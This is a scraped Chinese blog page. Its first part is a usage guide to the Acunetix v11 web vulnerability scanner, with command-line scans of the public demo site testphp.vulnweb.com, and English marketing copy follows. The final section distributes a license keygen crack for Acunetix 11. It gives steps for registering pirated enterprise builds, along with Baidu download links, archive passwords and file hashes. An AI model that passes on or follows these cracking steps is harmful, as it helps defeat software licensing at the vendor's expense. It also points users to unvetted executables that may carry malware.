https://4.bp.blogspot.com/-Lzp3Rz5Mqvc/WO4lcCXyMVI/AAAAAAAADfQ/aelQbX3M3uwLAHfEHgxdZOguvnGIahs5gCLcB/s1600/exporttoxml.png

(WVSC)也是没有这个功能…。

 

4. AWVSV11的【爬站】功能哪去了?

Choose Scanning Options -> Scan Type 选择 Crawl Only

https://3.bp.blogspot.com/-gVxRqf_4wa0/WO7fqZYzMLI/AAAAAAAADgI/rJDH9IPBz-I5_xVeuXPWMvtox-OyZD2XwCLcB/s1600/crawlonly.png

(WVSC)这还真是个不能说的秘密,看到指令集里完全没有提及有/crawl相关指令时我心都凉一半了,但经过测试发现,嘿嘿,关键在于指定profile。

在执行Scan或Crawl时,都是使用 /scan,差别在于要完整扫描时,会使用/scan <target> /profile Default,而纯爬站时则使用/scan <target> /profile empty.profile。

例如:

完整扫描

wvsc.exe /scan http://testphp.vulnweb.com /profile Default /log logfile.txt /ls my.lsr /save results.wvs

使用XSS模块扫描

wvsc.exe /scan http://testphp.vulnweb.com /profile xss /log logfile.txt /ls my.lsr /save results.wvs

纯爬站

wvsc.exe /scan http://testphp.vulnweb.com /profile empty.profile /log logfile.txt /ls my.lsr /save results.wvs

多亏了开启Debug scans选项,从log文件看出端倪啦!

5. 如果我想扫描【WebService】呢?

v10.5还有特别独立出来的Web Services功能(Scanner & Editor),但在AWVSV11已经完全找不到踪影。

尝试直接在AWVSV11 Add Target时输入Web Service URL然后启动扫描,并无任何问题。

(让我抱怨一下,玩了好久才发现文件夹的图示,是可以展开的,但前提是一定要点到那个”图标”而不是文字)

另外从log中可看到爬站时能确实辨别WSDL,参考v10.5预设用于Web Services的Profile (ws_default),发现其实所使用的Script与一般的网站扫描无异,只是少了很多XD。

https://3.bp.blogspot.com/--xAPNPck330/WO9BERKDHTI/AAAAAAAADg0/C7MuBEQdw9Qf6-z6U7bQ3KaOqoeiB0uagCLcB/s1600/log_wsdl.png

参考v10.5,Default的Profile为全部勾选,而ws_default只有在PerScheme类别部分勾选而已。
https://1.bp.blogspot.com/-8hKEBkS1yhY/WO9BU-OhdtI/AAAAAAAADg8/MKBVEDU3pMo_iXQxEYwQEbvJw2S_OWpfQCLcB/s1600/ws_default.png

6. AWVSV11的手动检测工具呢?

它们被拆散了,请到官方提供的这里另行下载安装。

安装后可用的手动检测工具包含HTTP Editor、HTTP Sniffer、HTTP Fuzzer、Blind SQL Injector等。

7. 忘记AWVSV11 Web登入密码了..?

安可以去开始菜单Acunetix 11找「Acunetix 11 Administrative Password」,可以直接重设密码。

总之,本次Acunetix大改版,最潮的就是那华丽的Web UI,然后打个比喻原本若是50个功能现在大概只找的到10了吧。

除此之外还有一些显而易见的特色功能:

Dashboard

在扫描期间发现的其他网站,会直接列在Discovered Hosts区块,方便直接create Target。

https://4.bp.blogspot.com/-JYwLcRqXQlM/WO4mx8bCBQI/AAAAAAAADfc/vBovdHEX02w7d4Oha-je5lYSMJhLdppTQCLcB/s1600/discoveredhosts.png

 

Continuous Scanning

目的是让受测系统一直保持在安全状态,所以提供此功能让该Target会自动一周进行一次Full Scan。
Targets -> (选择或新增Target) -> General -> Target Info -> Continuous Scanning (开启)
https://3.bp.blogspot.com/-VgefvtmXnBY/WO74fnsDY5I/AAAAAAAADgg/7B9BaQgaTuImRN2kHKTrDXX_JvDGYHbXQCLcB/s1600/contiscan.png
Role-based multi-user system

AWVSV11提供了一个新的角色概念,让执行扫描及产出报告的动作可由不同角色执行,详细请参考这里。此功能仅支持Enterprise licensed用户。

 

Acunetix CLI可用指令
【Acunetix 11】wvsc.exe
https://2.bp.blogspot.com/-EQxmRgYPq6A/WO2KGW3KmbI/AAAAAAAADe8/JWE2QizOfIIbgBDz-TBAf5AUbVRzQZtEACLcB/s1600/help_10_wvs_console.png

【Acunetix 10】wvs_console.exe

https://1.bp.blogspot.com/-yskDE1iEp0A/WO734imId4I/AAAAAAAADgY/ncGdDJr2lwc3JduUAn5-oykyOh5yAW7kgCLcB/s1600/help_10_wvs_console.png

Acunetix Version: 11.0.170951158(5 April 2017) & 10.5 Build 20160520

参考数据:

Acunetix AWVSV11 Product Manual

Acunetix Web Vulnerability Scanner Command Line Operation

Acunetix Support – Help and Documentation

 

转载请注明: 转载自Legend‘s BLog

本文链接地址: 关于Acunetix v11 WebUI下不得不说的事情!

Acunetix Web Vulnerability Scanner 11.x Service Provider License KeyGen By Hmily[LCG]

legend阅读(15192)评论(0)

Audit your website security
Firewalls, SSL and hardened networks are futile against web application hacking!
Hackers are concentrating on web-based applications (shopping carts, forms, login pages, etc) – accessible 24/7 – and directly connected to your database backends with valuable data. Web applications are tailor-made, less tested than off-the-shelf software and likely to have undiscovered vulnerabilities that can be a recipe for disaster. Don’t overlook Website security at your organization!

Acunetix is the leading web vulnerability scanner used by serious fortune 500 companies and widely acclaimed to include the most advanced SQL injection and XSS black box scanning technology. It automatically crawls your websites and performs black box AND grey box hacking techniques which finds dangerous vulnerabilities that can compromise your website and data.

Acunetix tests for SQL Injection, XSS, XXE, SSRF, Host Header Injection and over 3000 other web vulnerabilities. It has the most advanced scanning techniques generating the least false positives possible. Inbuilt vulnerability management helps you prioritize and manage vulnerability resolution.

In depth crawl and analysis – automatically scans all websites
Highest detection rate of vulnerabilities with low false positives
Integrated vulnerability management – prioritize & control threats
Integration with popular WAFs and Issue Trackers
Free network security scanning and Manual Testing tools
Available on premise and online


注:补丁必须解压出来运行才可以,禁止直接在压缩包中打开。如果补丁界面字体挡住按钮,请将系统字体DPI调成正常,重新打开补丁即可。

使用说明:由于官方下载正版不敢提供直接升级了,所以只有等小伙伴分享出来,再把正版安装包放网盘吧,由于官方的试用版是不带有注册功能的,建议先卸载老版本,再通过论坛下载最新的企业版安装包安装,安装完成后打开破解补丁,点Patch后可正常注册了,注册后支持正常升级。

原版下载地址(官方不支持升级啦,以后有小伙伴分享新版我会更新到这里):
链接:http://pan.baidu.com/s/1c1JoyBm 密码:hyue【由于之前被举报无法分享,这次原文件和补丁都加了压缩密码:www.52pojie.cn】

Acunetix Web Vulnerability Scanner 11.x Service Provider License KeyGen By Hmily[LCG].exe
MD5: 52BC7C27598D86197DC5EC4663DFF214
Acunetix_Web_Vulnerability_Scanner_11.x_Service_Provider_License_KeyGen_Hmily[LCG].rar
MD5: C7F99094664FCE1FBF20CC5456D97F90

请勿用于非法用途,测试后请尽快删除。

百度云盘下载(解压密码:www.52pojie.cn):
链接: https://pan.baidu.com/s/1dEE26Ff 密码: x8p1

无觅相关文章插件,快速提升流量